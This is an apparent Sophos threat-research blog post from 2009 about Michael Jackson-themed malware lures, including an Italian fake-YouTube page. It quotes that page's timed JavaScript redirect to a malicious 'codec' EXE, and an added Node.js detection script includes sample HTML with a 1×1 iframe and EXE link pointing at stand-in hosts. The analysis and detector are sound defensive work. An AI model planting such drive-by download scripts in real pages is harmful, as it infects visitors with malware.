International MJ Conspiracies With a Payload
Yes, sadly we're still talking about people taking advantage of Michael 
Jackson's death.

This week, we've seen a rise in malware purporting to show images and video 
leading up to Michael's death — many malware groups around the world appear to 
be getting in on the act.


MJ X-Files Mail Message


MJ X-Files Web Content

Anyone taking the standard precautions shouldn't have difficulty avoiding this 
one. Keep JavaScript disabled by default for untrusted sites, so the obfuscated 
script (Mal/ObfJS-BP) served through the 1×1 iFrame never runs; it tries to 
download and execute the EXE via an old Acrobat Reader vulnerability, so keeping 
Reader patched closes the other half of that chain. And don't run the linked EXE 
manually (everyone knows that clicking on EXEs on a web page is a bad idea, 
right?), which is how you would end up infected with Troj/ZBot-GJ.

While most of the malware is following this format, the Italians are getting a 
bit more creative:


MJ Italian Video Message

For those of you following along who don't read Italian, my rough translation 
of the text is as follows:

The whole world was devastated when Michael Jackson was found dead.
His death is surrounded with mystery; no one knows what happened, only that the 
mega star is dead.
But not just that. The following video clip shows Michael's last moments and 
the cruel truth about his death.
Watch it and do not forget to leave a flower on Michael's grave.
SHOCKING IMAGES! This video is not suited for children under the age of 16

This message contains a link to the following site:



The site, purporting to be an Italian-language YouTube page, throws up an error 
saying that you need to update your Flash player to view the video… with a 
download link to the "update", which is actually fake-codec malware 
Troj/ZBot-GK. It also contains the following JavaScript code that I found very 
interesting (the original is in Italian; my rough translation of each comment 
follows it):


<!--
function doDownload() {
// Genera il link al file zippato da scaricare
// (tr. Generate the link to the zipped file to download)
location.href = "http://youtube****.com/Codec/120.exe";;
}

// Fa partire il download dopo 10 secondi da quando
// l'intermprete JavaScript ha rilevato la funzione
// (tr. Start the download 10 seconds after the JavaScript interpreter has 
// detected the function)
window.setTimeout("doDownload()", 4000);
//-->

This code navigates the browser to the linked "codec" EXE four seconds after 
the script runs (the comment says ten seconds, but the setTimeout delay is 
4000 ms), whether or not the visitor touches the page; pointing location.href at 
an EXE produces a download prompt, so the victim still has to run it. What I find 
interesting is that the script is well formatted and commented in Italian, and 
that the comment describes generating a link to a zipped file even though the 
URL is an EXE, which suggests a reusable template being adapted for this 
campaign. This implies that you can expect to see other Italian-targeted 
malware of this kind in the future.
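As an added example, not code from the original post or from Sophos: a small Node.js triage script that flags the two delivery tricks described on this page, a near-invisible 1×1 iframe and a timer-driven redirect to an executable, by scanning page HTML statically. The sample HTML is constructed for the example, its hostnames use the reserved .invalid TLD, and only the doDownload()/setTimeout pattern mirrors the quoted snippet; the filename extensions treated as executable are my own list.

```javascript
// Constructed sample page (not a real capture). Hostnames use the reserved
// .invalid TLD; the script block mirrors the doDownload()/setTimeout pattern
// quoted in the post, with a 4000 ms delay.
const sampleHtml = `
<html><body>
<div id="player">Errore: aggiorna il tuo Flash player per vedere il video</div>
<a href="http://youtube-example.invalid/Codec/120.exe">Scarica il codec</a>
<iframe src="http://evil-example.invalid/x.html" width="1" height="1" frameborder="0"></iframe>
<script>
<!--
function doDownload() {
  // Genera il link al file zippato da scaricare
  location.href = "http://youtube-example.invalid/Codec/120.exe";
}
window.setTimeout("doDownload()", 4000);
//-->
</script>
</body></html>`;

// Extensions we treat as "directly executable" on Windows (assumed list).
const EXEC_EXT = /\.(exe|scr|com|pif|bat|cmd|msi)(\?|#|$)/i;

// Report iframes whose declared width or height is 1 pixel or less: the
// classic hidden loader frame used to pull in a drive-by exploit page.
function findHiddenIframes(html) {
  const hits = [];
  const iframeRe = /<iframe\b[^>]*>/gi;
  let m;
  while ((m = iframeRe.exec(html)) !== null) {
    const tag = m[0];
    const numAttr = (name) => {
      const r = new RegExp(`\\b${name}\\s*=\\s*["']?(\\d+)`, 'i').exec(tag);
      return r ? parseInt(r[1], 10) : null;
    };
    const width = numAttr('width');
    const height = numAttr('height');
    const src = (/\bsrc\s*=\s*["']([^"']+)/i.exec(tag) || [])[1] || '';
    if ((width !== null && width <= 1) || (height !== null && height <= 1)) {
      hits.push({ src, width, height });
    }
  }
  return hits;
}

// Report script-driven navigations (location / location.href assignments)
// whose target is an executable, along with any setTimeout delay found in
// the same script block, so a "wait N seconds, then push the EXE" pattern
// is visible without running the script.
function findTimedExeRedirects(html) {
  const hits = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const body = m[1];
    const navRe = /(?:window\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']/g;
    let n;
    while ((n = navRe.exec(body)) !== null) {
      const url = n[1];
      if (!EXEC_EXT.test(url)) continue;
      const t = /setTimeout\s*\(\s*[^,]+,\s*(\d+)\s*\)/.exec(body);
      hits.push({ url, delayMs: t ? parseInt(t[1], 10) : 0 });
    }
  }
  return hits;
}

// Combined verdict for a page: both lists empty means neither trick was seen.
function triage(html) {
  const hiddenIframes = findHiddenIframes(html);
  const exeRedirects = findTimedExeRedirects(html);
  return { hiddenIframes, exeRedirects, suspicious: hiddenIframes.length + exeRedirects.length > 0 };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(triage(sampleHtml), null, 2));
}
```

This is a static first pass for triage, not a substitute for a real detection engine: it will miss URLs that are assembled at runtime or hidden behind obfuscation like the Mal/ObfJS-BP sample mentioned above, which is exactly why keeping JavaScript off for untrusted sites remains the practical defence.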

You're still safe as long as you keep JavaScript disabled for untrusted 
websites and don't download the EXE: with the script blocked, the timed 
redirect never fires and the only remaining path is clicking the link yourself. 
But a "Flash player update" is a bit more tempting than the previous example's 
bare EXE.

Not to worry… Sophos blocks the e-mails, the websites, and the malware, so 
reading this blog is likely the closest you'll come to this sordid display of 
opportunism.

Posted on June 30th, 2009 by Andrew Ludgate, Threat Researcher, SophosLabs, 
Canada
